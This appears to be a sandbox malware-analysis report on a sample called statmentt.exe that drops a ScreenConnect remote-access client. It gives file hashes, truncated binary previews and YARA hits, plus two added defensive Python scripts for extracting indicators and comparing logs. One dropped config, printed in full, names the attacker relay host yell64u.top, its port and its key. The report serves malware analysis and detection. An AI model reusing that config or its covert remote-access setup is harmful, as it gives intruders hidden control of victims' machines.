                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):61216
                                                                                            Entropy (8bit):6.31175789874945
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                            MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                            SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                            SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                            SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):4.842791478883622
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):601376
                                                                                            Entropy (8bit):6.185921191564225
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                            MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                            SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                            SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                            SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):4.842791478883622
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                            Malicious:true
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):842248
                                                                                            Entropy (8bit):6.268561504485627
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                            MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                            SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                            SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                            SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):81696
                                                                                            Entropy (8bit):5.862223562830496
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                            MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                            SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                            SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                            SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):266
                                                                                            Entropy (8bit):4.842791478883622
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):3343
                                                                                            Entropy (8bit):4.771733209240506
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                            MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                            SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                            SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                            SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):939
                                                                                            Entropy (8bit):5.796466792414452
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                                            MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                                            SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                                            SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                                            SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
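The config above is the part of a ScreenConnect client install that actually carries the indicators: the relay host and port the agent will call back to, and the key it will trust. The following is an added example written for this report (it is not code from the report or from ConnectWise) that re-assembles that XML from the preview, where the ".." runs are CRLF line breaks, and pulls those values out. The report does not say what the k= parameter is; the example treats it as a base64-encoded CryptoAPI RSA PUBLICKEYBLOB because its bytes parse as one (the "BgIAAACkAABSU0Ex" prefix decodes to a BLOBHEADER with magic "RSA1"). Function names are the example's own.

```python
import base64
import hashlib
import struct
import xml.etree.ElementTree as ET
from urllib.parse import unquote

# Constructed input: the ScreenConnect client config dropped by msiexec.exe in
# this report, re-assembled from the preview (".." in the preview is CRLF).
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <ScreenConnect.ApplicationSettings>
    <setting name="ClientLaunchParametersConstraint" serializeAs="String">
      <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>
    </setting>
  </ScreenConnect.ApplicationSettings>
</configuration>
"""

CALG_RSA_KEYX = 0x0000A400  # CryptoAPI ALG_ID for an RSA key-exchange key


def launch_parameters(config_xml: str) -> dict:
    """Return the key/value pairs of ClientLaunchParametersConstraint.

    Values are percent-decoded with unquote, not unquote_plus: once decoded
    the base64 in k= contains literal '+' characters that must stay '+'.
    """
    root = ET.fromstring(config_xml.encode("utf-8"))
    for setting in root.iter("setting"):
        if setting.get("name") != "ClientLaunchParametersConstraint":
            continue
        raw = (setting.findtext("value") or "").lstrip("?")
        pairs = (p.split("=", 1) for p in raw.split("&") if "=" in p)
        return {unquote(k): unquote(v) for k, v in pairs}
    raise ValueError("ClientLaunchParametersConstraint not found")


def key_blob(config_xml: str) -> bytes:
    """Decode the k= parameter (percent-encoded base64) to raw bytes."""
    return base64.b64decode(launch_parameters(config_xml)["k"], validate=True)


def parse_capi_rsa_public_blob(blob: bytes) -> dict:
    """Parse a CryptoAPI PUBLICKEYBLOB: BLOBHEADER + RSAPUBKEY + LE modulus."""
    if len(blob) < 20:
        raise ValueError("blob too short for BLOBHEADER + RSAPUBKEY")
    btype, _version, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if btype != 0x06 or magic != b"RSA1":
        raise ValueError("not an RSA PUBLICKEYBLOB")
    modulus_le = blob[20:20 + bitlen // 8]
    if len(modulus_le) != bitlen // 8:
        raise ValueError("modulus truncated")
    return {
        "alg_id": alg,
        "bits": bitlen,
        "public_exponent": pubexp,
        "modulus": int.from_bytes(modulus_le, "little"),
    }


def extract_indicators(config_xml: str) -> dict:
    """Relay host/port plus a stable fingerprint of the embedded server key."""
    params = launch_parameters(config_xml)
    blob = key_blob(config_xml)
    key = parse_capi_rsa_public_blob(blob)
    return {
        "relay_host": params["h"],
        "relay_port": int(params["p"]),
        "key_bits": key["bits"],
        "key_exponent": key["public_exponent"],
        "key_sha256": hashlib.sha256(blob).hexdigest(),
    }


if __name__ == "__main__":
    for name, value in extract_indicators(SAMPLE_CONFIG).items():
        print(f"{name}: {value}")
```

The host and port are what you block and hunt for in proxy and firewall logs; the SHA-256 of the decoded key blob is worth keeping alongside them, because an operator can move the relay to a new hostname while the server key embedded in every client they build stays the same.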
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):746
                                                                                            Entropy (8bit):5.349174276064173
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                            MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                            SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                            SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                            SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                            Process:C:\Users\user\Desktop\statmentt.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):321
                                                                                            Entropy (8bit):5.36509199858051
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                            MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                            SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                            SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                            SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                            Malicious:true
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
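The two ASCII logs above (the one written by rundll32.exe and the one written by statmentt.exe) record which .NET assemblies each process bound and which native images it resolved them to. The report does not name the format; the layout matches the CLR usage logs the .NET Framework writes under %LOCALAPPDATA%\Microsoft\CLR_v4.0_32\UsageLogs\ for 32-bit processes, which is an assumption of this added example, not something the report states. The code is written for this report and is not from the report itself; it re-assembles both logs from their previews (".." is a CRLF line break), parses them as one record per line (type, quoted name, optional quoted path or value, flag), and diffs the bound assemblies of the two processes.

```python
import csv
import io

# Constructed inputs: the two dropped logs, re-assembled from the previews.
RUNDLL32_LOG = r"""1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0
3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
"""

STATMENTT_LOG = r"""1,"fusion","GAC",0
1,"WinRT","NotApp",1
3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0
2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0
"""


def parse_usage_log(text: str) -> list:
    """Split each line into type, name, optional detail (path or value), flag.

    The csv module is used because assembly display names contain commas
    inside the quotes; Windows paths contain no escape characters csv cares about.
    """
    records = []
    for row in csv.reader(io.StringIO(text)):
        if not row:
            continue
        if len(row) not in (3, 4):
            raise ValueError(f"unexpected record layout: {row!r}")
        records.append({
            "type": int(row[0]),
            "name": row[1],
            "detail": row[2] if len(row) == 4 else None,
            "flag": int(row[-1]),
        })
    return records


def bound_assemblies(records: list) -> dict:
    """Map simple assembly name -> native image path (None if none was logged).

    A record whose name is a full display name (contains "Version=") is an
    assembly bind; the "fusion"/"WinRT" records are runtime settings and are
    skipped. This classification is the example's assumption about the format.
    """
    bound = {}
    for rec in records:
        if "Version=" in rec["name"]:
            bound[rec["name"].split(",", 1)[0]] = rec["detail"]
    return bound


def compare_logs(log_a: str, log_b: str) -> dict:
    """Assemblies bound by one process but not the other, in both directions."""
    bound_a = bound_assemblies(parse_usage_log(log_a))
    bound_b = bound_assemblies(parse_usage_log(log_b))
    return {
        "only_in_a": sorted(set(bound_a) - set(bound_b)),
        "only_in_b": sorted(set(bound_b) - set(bound_a)),
        "shared": sorted(set(bound_a) & set(bound_b)),
    }


if __name__ == "__main__":
    print(compare_logs(RUNDLL32_LOG, STATMENTT_LOG))
```

Run against the two previews, the diff shows that the rundll32.exe-hosted code additionally bound System.Core and System.Configuration, which the sample's own process never did; that is the kind of per-process detail these logs give an investigator that a plain "was .NET loaded" check does not.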
                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                            Category:dropped
                                                                                            Size (bytes):1086792
                                                                                            Entropy (8bit):7.793516535218678
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                            MD5:30CA21632F98D354A940903214AE4DE1
                                                                                            SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                            SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                            SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):234
                                                                                            Entropy (8bit):4.977464602412109
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                            MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                            SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                            SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                            SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                            Malicious:false
                                                                                            Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):49152
                                                                                            Entropy (8bit):4.62694170304723
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                            MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                            SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                            SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                            SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):36864
                                                                                            Entropy (8bit):4.340550904466943
                                                                                            Encrypted:false
